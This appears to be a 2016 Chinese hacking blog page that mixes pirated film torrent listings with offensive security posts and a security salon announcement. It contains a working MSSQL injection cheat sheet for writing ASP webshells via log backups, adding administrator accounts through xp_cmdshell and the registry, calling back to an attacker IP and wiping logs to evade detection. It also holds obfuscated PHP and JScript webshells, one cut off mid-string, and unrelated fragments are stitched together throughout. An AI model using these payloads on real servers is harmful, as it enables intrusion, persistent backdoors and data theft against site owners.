2016年3月


导演: 袁和平
编剧: 约翰·福斯克 / 王度庐
主演: 甄子丹 / 杨紫琼 / 岑勇康 / 刘承羽 / 李截 / 更多...
类型: 剧情 / 动作 / 武侠 / 古装
制片国家/地区: 中国大陆 / 美国
语言: 国语/英语
上映日期: 2016-02-19(中国大陆) / 2016-02-26(美国)
片长: 103分钟
又名: 卧虎藏龙2:青冥宝剑 / 卧虎藏龙Ⅱ青冥宝剑 / 铁骑银瓶
IMDb链接: tt2652118
卧虎藏龙:青冥宝剑的剧情简介 · · · · · ·
武当弃徒戴阎王(李截 Jason Scott Lee 饰)为抢夺青冥古剑夜袭铁小贝勒府,俞秀莲(杨紫琼 饰)重出江湖,携手旧友孟思昭(甄子丹 饰)保护宝剑,被蒙蔽的魏方(岑勇康 Harry Shum Jr. 饰)助纣为虐,雪瓶(刘承羽 Natasha Liu Bordizzo 饰)告知魏方其身世之谜。一场江湖混战,众人力擒戴阎王,保护宝剑周全。
影片改编自王度庐小说《铁骑银瓶》。





解压密码:blog.xiaohack.org

下载地址:卧虎藏龙2:青冥宝剑【2G】.torrent

第1种:

regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

然后type c:\\tsport.reg | find "PortNumber"
然后16进制转10进制查明文;这个网站可以转换http://jinzhi.supfree.net

c:\\tsport.reg可能会出现无法创建目录文件 自己找个可写目录吧

第2种方法:执行tasklist /svc
我们只要svchost.exe对应的PID号(svchost.exe TermService对应的PID号,请把PID记录下来),然后执行netstat /ano查到pid对应的Local Address端口就是3389修改后的端口了

第3种 shell权限大点的话在注册表里直接查看 shell里的提权探测那里有些也能看到 有时43958可能提权了 可是权限低没法执行cmd wscript删了就传aspx马 再不行默认3389试试能远程连接不 扫1-9999查端口估计测试到手软 因为开放端口实在太多了 一个一个测试?


译  名 Kung Fu Panda 3
片  名 功夫熊猫3/熊猫阿宝3/阿宝正传3
年  代 2016
国  家 中国大陆 / 美国
类  别 喜剧 / 动作 / 动画 / 冒险
上映日期 2016年1月29日 中国
语  言 英语
字  幕 简体中英 / 简体
链  接 http://www.imdb.com/title/tt2267968/
评  分 7.8/10 from 754 users
豆瓣评分 8.0/10 from 84,5856 users
豆瓣链接 http://movie.douban.com/subject/11589036/
文件格式 x264 + AAC
视频尺寸 1280 x 720
文件大小 1.98 GB
片  长 95分钟
导  演 亚历山德罗·卡罗尼  Alessandro Carloni
吕寅荣  Jennifer Yuh
主  演 杰克·布莱克  Jack Black ... Po
布莱恩·科兰斯顿  Bryan Cranston
达斯汀·霍夫曼  Dustin Hoffman
安吉丽娜·朱莉  Angelina Jolie
J·K·西蒙斯  J.K. Simmons
塞斯·罗根Jackie Chan
塞斯·罗根  Seth Rogen
刘玉玲  Lucy Liu
David Cross
凯特·哈德森  Kate Hudson
吴汉章  James Hong
兰德尔·杜克·金  Randall Duk Kim

影视简介:

在新一集故事里,阿宝(杰克·布莱克 Jack Black 配音)失散已久的亲生父亲突然现身,重逢的父子二人一起来到了一片不为人知的熊猫乐土。在这里,阿宝遇到了好多滑稽的熊猫同类。当拥有神秘力量的大反派天煞(J·K·西蒙斯 J.K. Simmons 配音)横扫神州大地,妄图残害所有功夫高手时,阿宝必须迎难而上,学着把那些热爱享乐、笨手笨脚的熊猫村民训练成一班所向披靡的功夫熊猫!

影视截图:

 

2016.功夫熊猫3.HD超清中字.720P.torrent

百度网盘(速度保存) http://pan.baidu.com/s/1biotMe   提取密码 uqme

[功夫熊猫3][HC-HDRip.720P.MKV][1.93GB][中英字幕].torrent

MSSQL2005手工注入列目录写马

啊d能注入的话就不用往下看了
sqlmap能注入出密码

判断是否支持多行语句以下用法要求支持多行语句才能使用:
;declare @x int--
比如a.asp?id=1;declare @x int--
key.asp?kwyname=qq%';declare @x int-- and '%'='

返回页面和不加语句时的一样正常说明支持,当然一开始要求是注入点

参数后面加语句,有些过滤了--自己去突破要么不加,过滤了单引号我有办法绕过

建表p(i为自动编号,a记录盘符类似"c:\",b记录可用字节,其它省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));--

URL;insert p exec xp_availablemedia;--列出所有驱动器并插入表p

URL;and (select count(*) from p)>3;--折半法查出驱动器总数

URL;and ascii(substring((select a from p where i=1),1,1))=67;--折半法查出驱动器名(注asc(c)=67)

--上面一般用于无显错情况下使用-------以此类推,得到所有驱动器名

URL;and (select a from p where i=1)>3;--报错得到第一个驱动器名

--上面一般用于显错情况下使用-------以此类推,得到所有驱动器名

URL;;drop table p;--删除表p

--(2) ******查看目录方法******

URL;create table pa(m nvarchar(255),i nvarchar(255));--建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;--列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;--折半法查出i深度

URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;--报错得到深度i=1的第一个目录名

--上面一般用显错且目录名不为数字情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;--折半法查出深度i=1的第一个目录名的长度

URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;--折半法查出深度i=1的第一个目录名的第一个字符长度

--上面一般用无显错情况下使用-------(得到第二个目录把"top 0"换为"top 1",换深度只换i就行)以此类推,得到e盘的所有目录

URL;drop table pa;--删除表pa

----------------------------经过上面的方法就可得到服务器所有目录(这里为连接用户有读取权限目录)-----------------

--(3) 数据库备份到Web目录(先拿个WebShell再说吧 注:此为SQL Server2000)

URL;alter database employ_ set RECOVERY FULL;--把当前库L设置成日志完全恢复模式

URL;URL;create table s(l image);--建表s

URL;backup log s to disk = ’c:cmd’ with init;--减少备分数据的大小

URL;URL;insert s values(’<%execute(request("a"))%>’)--在表s中插入一句话马

URL;backup log hh to disk = ’e:\web\g.asp’;--备分日志到WEB路径

URL;drop table s;--删除表s

URL;alter database hh set RECOVERY SIMPLE;--把SQL设置成日志简单恢复模式

--------------------------------------OK到此WebShell应该到手了-----------------------------------------------

--(4) 以下为一些注入杂项

----SA权限:

URL;exec aster.dbo.sp_addlogin hacker;--添加SQL用户

URL;exec master.dbo.sp_password null,hacker,hacker;--设置SQL帐号hacker 的密码为 hacker

RL;exec master.dbo.sp_addsrvrolemember sysadmin hacker;--加hacker进sysadmin管理组

URL;exec master.dbo.xp_cmdshell ’net user hacker hacker /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;--建立一个系统用hacker 并设置其密码为hacker

URL;exec master.dbo.xp_cmdshell ’net localgroup administrators hacker /add’;--hacker加入到管理员组

----SQL Server2005暴库、表、段法(前提有显错、无显错用折半法)

URL and 0<(select count(*) from master.dbo.sysdatabases);--折半法得到数据库个数

URL and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--

--依次提交 dbid = 2.3.4... 得到更多的数据库名

URL and 0<(select count(*) name from employ.dbo.sysobjects where xtype=’U’);--折半法得到表个数(假设暴出库名employ)

URL and 0<(select top 1 name from employ.dbo.sysobjects where xtype=’U’)

-- 假设暴出表名为"employ_qj"则在上面语句上加条件 and name not in (’employ_qj’ 以此一直加条件....

URL and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = ’u’ and name = ’employ_qj’));--

--假设暴出字段名为"id"则在上面语句上加上条件 and name not is(’id’) 以此一直加条件....

---------------------按上面方法库、表、段的名称都可以得到----用以上方法可以得到段段里的数据--------------------

select * from master.dbo.sysdatabases --查询数据库

select * from NetBook.dbo.sysobjects where xtype=’u’ --查询数据库NetBook里的表

select * from NetBook.dbo.syscolumns where id=object_id(’book’) --查询book表里的字段

---------------------------------------------------------------------------------------------------------------

---------------------------------------SQL扩展沙盘提权-----------------------------------

看来xp_cmdshell是不能用鸟~ 不过偶们还有SP_OAcreate可以用 用SP_OAcreate一样可以执行系统命令
在查询分析器里执行
DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD
@shell,’run’,null, ’C:\WINdows\system32\cmd.exe /c net user gydyhook hook /add’
这段代码就是利用SP_OAcreate来添加一个gydyhook的系统用户 然后直接提升为管理员权限就OK了
提示命令完成成功
直接写
个一句话进去
语句如下
exec master.dbo.xp_subdirs ’d:\web\www.xx.com’;
exec sp_makewebtask ’d:\web\www.XXXX.com\XX.asp’,’select’’<%execute(request("SB"))%>’’ ’
提示命令执行成功偶们看看效果

查询分析器里执行select * from openrowset(’microsoft.jet.oledb.4.0’,’
;database=c:\windows\system32\ias\ias.mdb’,
’select shell("cmd.exe /c net user admin admin1234 /add")’)来利用沙盘来添加个管理员 但是事实告诉
我 我的RP并不好

嘿嘿 使用declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’opentextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’readline’, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, ’readline’, @line out
end
这段代码就可以把ServUDaemon.ini里的配置信息全部显示出来 嘿嘿 既然能看了那偶门不是一样可以写进去?
直接写一个系统权限的FTP帐号 进去
使用declare @o int, @f int, @t int, @ret int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ’createtextfile’, @f out, ’d:\Serv-U6.3\ServUDaemon.ini’, 1
exec @ret = sp_oamethod @f, ’writeline’, NULL, 《这里添写自己写好的SU配置信息 刚才复制的那些都要
写上去》
然后执行一下 成功执行 我们再用存储过程看看写进去没有
OK 我XXXXXX 成功写进去了一个用户名为XXXX密码为空的系统权限的FTP 然后偶们在FTP里执行
quote siteXXXXXXX 提权就好了。 这里已经很熟悉了 就不写了。~ 然后用3389连一下 成功地到服务器权限
然后偶们再用set nocount on
declare @logicalfilename sysname,
@maxminutes int,
@newsize int 来清理掉SQL日志 免的被管理员发现

------
DECLARE @cmd INT EXEC sp_oacreate &apos;wscript.shell&apos;,@cmd output

EXEC sp_oamethod @cmd,&apos;run&apos;,null,&apos;cmd.exe /c net user renwoxin$Content$nbsp;test /add&a

------------------------------MSSQL db_owner注入利用xp_regwrite获得系统权限---------------------------------------

xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq1’,’REG_SZ’,’net user h86$ hacker /add’
呵呵,返回一个正常页面,说明成功完成拉,再在注射点输入
xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\currentversion\run’,’xwq2’,’REG_SZ’,’net localgroup administrators h86$ /add’

---------------------------------------------------------------------------------------------

简单的如where xtype=’U’,字符U对应的ASCII码是85,所以可以用where xtype=char(85)代替;

如果字符是中文的,比如where name=’用户’,可以用where name=nchar(29992)+nchar(25143)代替。

-------------------------------------------备份一句话木马----------------------------------------

日志备分WEBSHELL标准的七步:

1.InjectionURL’;alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)

2.InjectionURL’;create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL’;backup log XXX to disk = ’c:cmd’ with init-- (减少备分数据的大小)

4.InjectionURL’;insert into cmd (a) values (’<%%25eval(request("a")):response.end%%25>’)-- (插入一句话木马)

5.InjectionURL’;backup log XXX to disk = ’d:chinakmtest.asp’-- (备分日志到WEB路径)

6.InjectionURL’;drop table cmd-- (删除新建的cmd表)

7.InjectionURL’;alter database XXX set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)

注:InjectionURL是注入点,XXX是数据库名称.

数据库差异备份代码:
BACKUP/**/LOG/**/peihua/**/WITH/**/NO_LOG/**/DBCC/**/SHRINKDATABASE(peihua)--

dump/**/transaction/**/peihua/**/with/**/no_log--
0.dump transaction 数据库名 with no_log 清空日志

1、create table [dbo].[jm_tmp] ([cmd] [image])-- 创建一个表

2、 declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0X6A006D00640063007700 backup database @a to disk = @s --备份数据库,@s为备份名称(jmdcw的16进制转换)

3、insert into [jm_tmp](cmd) values(0x3C2565786563757465287265717565737428226C222929253E)--将一句话木马 "<%execute(request("l"))%>"的16进制字符插入到表中

4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions40isapihsqq.asp’ backup database @a to disk = @s WITH DIFFERENTIAL,FORMAT --对数据库实行差异备份,备份的保存路径暂定为C盘目录,文件名为hsqq.asp。

5、drop table [jm_tmp]-- 删除此表。

---------------------------------------------------防--------------------------------------------

Function SafeRequest(ParaName,ParaType)
’--- 传入参数 ---
’ParaName:参数名称-字符型
’ParaType:参数类型-数字型(1表示以上参数是数字,0表示以上参数为字符)

Dim Paravalue
Paravalue=Request(ParaName)
If ParaType=1 then
If not isNumeric(Paravalue) then
Response.write "参数" & ParaName & "必须为数字型!"
Response.end
End if
Else
Paravalue=replace(Paravalue,"’","’’")
End if
SafeRequest=Paravalue
End function
-- 绕过单引号继续注入

URL;declare @cmd sysname select @cmd=这里为你要执行命令的16进制 exec master.dbo.xp_cmdshell @cmd;--

--先声明一个变量cmd,然后把我们的指令赋值给cmd

--sql server 2005下开启xp_cmdshell的办法

EXEC sp_configure ’show advanced options’, 1;RECONFIGURE;EXEC sp_configure ’xp_cmdshell’, 1;RECONFIGURE;

--SQL2005开启’OPENROWSET’支持的方法:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ad Hoc Distributed Queries’,1;RECONFIGURE;

--SQL2005开启’sp_oacreate’支持的方法:

exec sp_configure ’show advanced options’, 1;RECONFIGURE;exec sp_configure ’Ole Automation Procedures’,1;RECONFIGURE;

在db权限并且分离获取mssql数据库服务器ip的方法

1.本地nc监听 nc -vvlp 80

2.;insert into OPENROWSET(’SQLOLEDB’,’uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;’, ’select * from dest_table’) select * from src_table;--
---------------------------------以下为检测方法---------------------------------

--检测可否注入
=============================================================================
URL and 1=1;--正常页面
URL and 1=2;--出错页面

=============================================================================
--检测数据库的
=============================================================================
URL and (select count(*) from sysobjects)>0;--返回正常sql server
URL and (select count(*) from msysobjects)>0;--返回正常Access

=============================================================================
--检测路径的
=============================================================================
URL and (select count(*) from master.dbo.sysdatabases where name>0 and dbid=6)>0;--

=============================================================================
--检测表段的
=============================================================================
URL and exists (select * from admin);--

=============================================================================
--检测字段的
=============================================================================
URL and exists (select username from admin) ;--

=============================================================================
--检测ID
=============================================================================
URL and exists (select id from admin where ID=1) ;--

=============================================================================
--检测长度的
=============================================================================
URL and exists (select id from admin where len(username)=5 and ID=1);--

=============================================================================
--检测是否为MSSQL数据库
=============================================================================
URL and exists (select * from sysobjects) ;--

=============================================================================
--检测是否为英文 ;--
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1);-- ACCESS数据库
URL and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1) ;--MSSQL数据库

=============================================================================
--检测英文的范围
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1);--MSSQL数据库

=============================================================================
--检测那个字符
=============================================================================

URL and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1);--ACCESS数据库

URL and exists (select id from admin where unicode(substring(username,1,1))=97 and ID=1);--MSSQL数据库

◎译  名 YipMan3
◎片  名 叶问3
◎年  代 2015
◎国  家 中国大陆/香港
◎类  别 剧情/传记/动作/历史
◎语  言 汉语普通话/粤语/英语
◎上映日期 2015-12-24(香港)/2016-03-04(中国大陆)
◎IMDb评分  7.9/10 from 4,137 users
◎IMDb链接  http://www.imdb.com/title/tt2888046/
◎豆瓣评分 6.7/10 from 22,092 users
◎豆瓣链接 http://movie.douban.com/subject/11598977/
◎片  长 105分钟
◎导  演 叶伟信 Wilson Yip
◎主  演 甄子丹 Donnie Yen
      迈克·泰森 Mike Tyson
      张晋 Jin Zhang
      熊黛林 Lynn Hung
      谭耀文 Patrick Tam
      吴千语 Karena Ng
      喻亢 Kang Yu
      郑则仕 Kent Cheng
      梁家仁 Ka-Yan Leung
      张继聪 Louis Cheung
      陈国坤 Kwok-Kwan Chan

◎简  介

  1959年,叶问(甄子丹 饰)与张永成(熊黛林 饰)将大儿子叶准送回广东,小儿子叶正继续在香港读书。在与马鲸笙(谭耀文 饰)与其老板(泰森 饰)所带领的帮派抗争的过程中,叶问带领着自己的弟子保卫了小学,并结识了依靠拉车和在地下赌场斗武为生的张天志(张晋 饰),二 人惺惺相惜。然而 此时,自称 “咏春正宗” 的张天志却向叶问公开宣战,要为自己新开的武馆争取名誉。可是张永成突然病危,让叶问不得不肩负起照顾妻儿的责任。面对家庭和武术,叶问究竟会作何选择?他是否会应战张天志,夺回属于他 “咏春正宗” 的头衔?

◎获奖情况

  第35届香港电影金像奖  (2016)
  最佳电影(提名)
  最佳导演(提名) 叶伟信
  最佳男配角(提名) 张晋
  最佳摄影(提名)
  最佳剪接(提名)
  最佳动作设计(提名)
  最佳音响效果(提名)
  最佳视觉效果(提名)

Title........: Yip Man 3 (2015)
Release Group: BMDru
Ripper ......: chinyan
Release Date : 03/13/2016
HD Source....: Ip Man 3 2015 Blu-ray 1080p AVC DTSX 7.1-MTeam
Video Format : x264
Video Bitrate: 3181KBit/s
Aspect Ratio : 2.353:1
Resolution ..: 1280 x 544
Audio Format : AC3
Audio Bitrate: 640 kb/s
BD Length ...: 1:44:41 (h:m:s)
Frame Rate ..: 24 fps
Language.....: Mandarin / Cantonese
Subtitle(s) .: N / A
Film Genre...: Action, Biography, Drama
File Size ...: 3.25 GB
IMDB Rating..: 7.7/10 from 5,785 users
http://www.imdb.com/title/tt2888046/

Encoding settings : ref=16 / subme=11 / Bbframes=16 me=umh / me_range=48

x264 [info]: profile High, level 5.0
x264 [info]: frame I:2301  Avg QP:19.76  size: 73777
x264 [info]: frame P:69520 Avg QP:20.20  size: 28206
x264 [info]: frame B:78933 Avg QP:23.77  size:  4570
x264 [info]: consecutive B-frames: 20.4% 29.7% 13.2% 16.1% 16.3%  3.6%  0.2%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.0%  0.3%
encoded 150754 frames, 3.44 fps, 3172.97 kb/s

链接:http://pan.baidu.com/s/1pKye4Uf 密码:mn45

叶问3种子文件1.4G:Ip.Man.3.2015.720p.BluRay.x264.AAC-Tvboxnow.torrent

叶问3种子文件2.5G: 叶问3Ip.Man.3.2015.720p.BluRay.x264-WiKi.torrent

由于是种子文件,不能直接上传,所以改为TXT上传。

将文件重命名为种子文件后缀名即可。视频解压密码:blog.xiaohack.org/yewen3

Pocscan是一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC 按照官方规范编写的 Poc对目标域名进行漏洞扫描。
提供了chrome浏览器插件,自动抓取页面的dns发到扫描后端.
3.png
2.png
1.png
下载地址https://github.com/erevus-cn/pocscan/
骚年,现在你就只缺POC了...还不快去爬!!

<?php 
if(isset($_REQUEST['hello'])){ 
$i[0] = 'asse'.'rt'; 
$array[] = $i; 
$key=str_replace("yBZ","",$_POST[ad]); 
$i[1]=base64_decode($key); 
$array[0][0]($i[1]); 
} 
?>

 POC:
POST:
hello=1&yBZcGhwaW5mbygpOw==   //PHPINFO();

百度了一下,还没有搜索到。
WooYun: 过安全狗/D盾/360PHP一句话 搜索到这个链接。
这个马儿可能根据这个变种吧。个人意见而已~

只具有简单的文件管理功能,菜刀配置选Cutstomize 密码:z

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>

var Sp = String(Request.form('z'));

var Fla = {'E':eval};

var St=""

var A="H74H72H79H7BH76H61H72H20H53H3DH22H2DH3EH7CH22H2BH53H65H72H76H65H72H2EH4DH61H70H70H61H74H68H28H22H2FH22H29H2BH22H5CH74H22H3BH76H61H72H20H6FH46H73H6FH20H3DH20H53H65H72H76H65H72H2EH43H72H65H61H74H65H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH76H61H72H20H6FH44H72H69H76H65H72H73H20H3DH20H6FH46H73H6FH2EH44H72H69H76H65H73H3BH66H6FH72H28H76H61H72H20H78H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H6FH44H72H69H76H65H72H73H29H3BH21H78H2EH61H74H45H6EH64H28H29H3BH78H2EH6DH6FH76H65H4EH65H78H74H28H29H29H20H7BH76H61H72H20H6FH44H72H69H76H65H72H20H3DH20H78H2EH69H74H65H6DH28H29H3BH53H2BH3DH6FH44H72H69H76H65H72H2EH50H61H74H68H3BH7DH53H2BH3DH22H7CH3CH2DH22H3BH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H29H3BH7DH63H61H74H63H68H28H65H29H7BH7D";

var B="H76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H62H29H7BH0AH76H61H72H20H63H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH53H75H62H46H6FH6CH64H65H72H73H29H3BH0AH66H6FH72H20H28H3BH21H63H2EH61H74H45H6EH64H28H29H3BH63H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H6FH28H63H2EH69H74H65H6DH28H29H29H3BH0AH76H61H72H20H66H3DH6EH65H77H20H45H6EH75H6DH65H72H61H74H6FH72H28H66H73H6FH2EH47H65H74H46H6FH6CH64H65H72H28H62H29H2EH66H69H6CH65H73H29H3BH0AH66H6FH72H20H28H3BH21H66H2EH61H74H45H6EH64H28H29H3BH66H2EH6DH6FH76H65H4EH65H78H74H28H29H29H62H66H69H28H66H2EH69H74H65H6DH28H29H29H0AH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H6FH28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH2FH5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H30H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH66H75H6EH63H74H69H6FH6EH20H62H66H69H28H66H29H7BH53H2BH3DH66H2EH4EH61H6DH65H2BH22H5CH74H22H2BH66H2EH44H61H74H65H4CH61H73H74H4DH6FH64H69H66H69H65H64H2BH22H5CH74H22H2BH66H2EH73H69H7AH65H2BH22H5CH74H22H2BH66H2EH41H74H74H72H69H62H75H74H65H73H2BH22H5CH6EH22H3BH7DH0AH76H61H72H20H53H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H53H2BH22H7CH3CH2DH22H29H3B";

var C="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH4FH70H65H6EH54H65H78H74H66H69H6CH65H28H66H2CH31H2CH30H29H3BH0AH78H69H65H3DH78H69H65H2BH66H2EH52H65H61H64H41H6CH6CH28H29H2BH22H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu8BFBHu53D6Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B";

var D="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH76H61H72H20H66H3DH66H73H6FH2EH43H72H65H61H74H65H54H65H78H74H46H69H6CH65H28H66H2CH31H29H3BH0AH66H2EH57H72H69H74H65H28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH32H27H29H29H3BH0AH66H2EH63H6CH6FH73H65H28H29H3BH0AH78H69H65H2BH3DH22H31H7CH3CH2DH22H3BH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22H45H52H52H4FH52H3AH2FH2FHu6587Hu4EF6Hu5199Hu5165Hu5931Hu8D25H21H7CH3CH2DH22H7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B";

var E="H66H75H6EH63H74H69

 

Screenshot_2016-03-14-21-50-24手机也没什么好玩的。没话费没流量,就开了个10元1G流量。发现QQ群里有个说有安卓版的sqlmap的工具,当即Baidu了下来。由于是手机编辑。可能图片跑偏了。但是别在意这些细节。Screenshot_2016-03-14-22-36-43Screenshot_2016-03-14-23-20-37我也是昨天下载的。有什么问题别来问我。我到群里都问成狗了。不会英语就是这么X

 

 

下载地址:http://pan.baidu.com/s/1pJ03ISN

密码: 7z7i

大家下午好,欢迎收看今天的乌云电视台新闻播报。

 

现在是3月10日,农历二月初二(听说要剪头发...啊…跑题了),天气还行,空气过得去,湿度…好了,说正题。

 

今天阳光明媚,春光灿烂,乌云沙龙「深圳站」议题即将公布(还没买票正在观望那几个人我看着你们呢...

 

下面是议题播报:

 

- 议题一:来自 do9gy 的《漏洞与锁》

 

- 漏洞与开锁一直是Black Hat最热门的两大话题,二者确有千丝万缕的联系,它们都涉及到“权限与绕过”。 do9gy 将以介绍开锁的方式科普漏洞,以漏洞的视角解析开锁。让懂安全的人学会开锁,让会开锁的人了解安全。

 

- 议题二:来自 听云 的 《网络劫持问题定位与分析》

 

- 手机浏览网页总是会弹出某运营商的流量小广告,加入乌云以后我才知道这特么叫「劫持」!TAT  听云作为一个同样崇尚技术、热爱分享的企业,在运营与实践的过程中,对于劫持有了自己的认识与积累。他们将从劫持问题的分类、劫持问题的现状以及劫持问题定位与分析展示他们在劫持上的一些研究。

 

- 议题三:来自 「你们最爱的」 phithon 的 《CodeIgniter框架中的漏洞挖掘与安全开发》

 

- CodeIgniter是一款轻量级PHP开发框架(反正我是昨天才听说的),被国内外很多公司所采用。本议题由浅入深,通过数个已公开/未公开的漏洞(0day)入手,深入分析CI框架特性,总结在开发中常见的错误,并给出安全可靠的解决方案。学习此议题,左可做白帽子横扫漏洞,右可为开发者阻御攻击,绝对物超所值~(不用谢我把你们最爱的他带来了)

 

- 议题四:来自 开源中国 的 《Git架构建设的经验》

 

- 开源中国是一个好大好大的开源技术社区,在Git发展的这几年也是踩过各种坑,本次沙龙,开源中国的红薯老师将介绍他们曾踩过的坑、遭遇过的几次攻击以及防护措施,同时会根据他们对 Gitlab 本身做的大量改进来介绍如何构建大型的 Git 代码仓库,另外也将介绍一种最新的分布式存储架构。技术嘛~多学点总是没错的!

 

议题播报结束,接下来是沙龙须知播报:

 

- 沙龙时间:2016年3月26日下午1点

 

- 沙龙地点:深圳市南山区文化路讯美科技广场3号楼15层阿基米互联网公社

 

- 我查了一下,在距离其970米和1公里的地方分别有高新园地铁站以及深大地铁站,不熟路的可以使用地图软件导航过去,毕竟我对深圳不熟,一会儿带你们跑偏了不好TAT

 

- 沙龙议程:

 

- 13:00-13:30  签到

- 13:30-13:35  主持人开场

 

- 13:35-14:05  议题一:《漏洞与锁》

- 14:05-14:10  爱问啥问啥(前提:问题围绕议题)

 

- 14:10-14:40  议题二:《网络劫持问题定位与分析》

- 14:40-14:45  想咋问咋问(前提:与议题有关)

 

- 14:45-14:55  爱咋疯咋疯(就是茶歇)

 

- 14:55-15:25  议题三:《CodeIgniter框架中的漏洞挖掘与安全开发》

- 15:25-15:30  这个可以随便问(前提:别把我P吓到就行)

 

- 15:30-16:00  议题四:《Git架构建设经验》

- 16:00-16:05  想问啥抓紧时间(前提:问点靠谱的)

 

- 16:05-16:35  现场交流(我会努力把狗哥 @疯狗 带去的!

 

- 写在最后的话(最后还是要说几点)

 

- 请大家凭借购买ID有秩序地签到入场,购票截止日期是3月25日,我会坚守到最后一天,小秘书会将集市购票名单给我。如有特殊情况不能到场,请提前告知 @佳佳佳佳佳 ,站内私信也好,QQ也好,微信也好,记得要提前告诉我喔~如果被我发现恶意占用名额的,将会受到惩罚喔~在此感谢各位的配合!

 

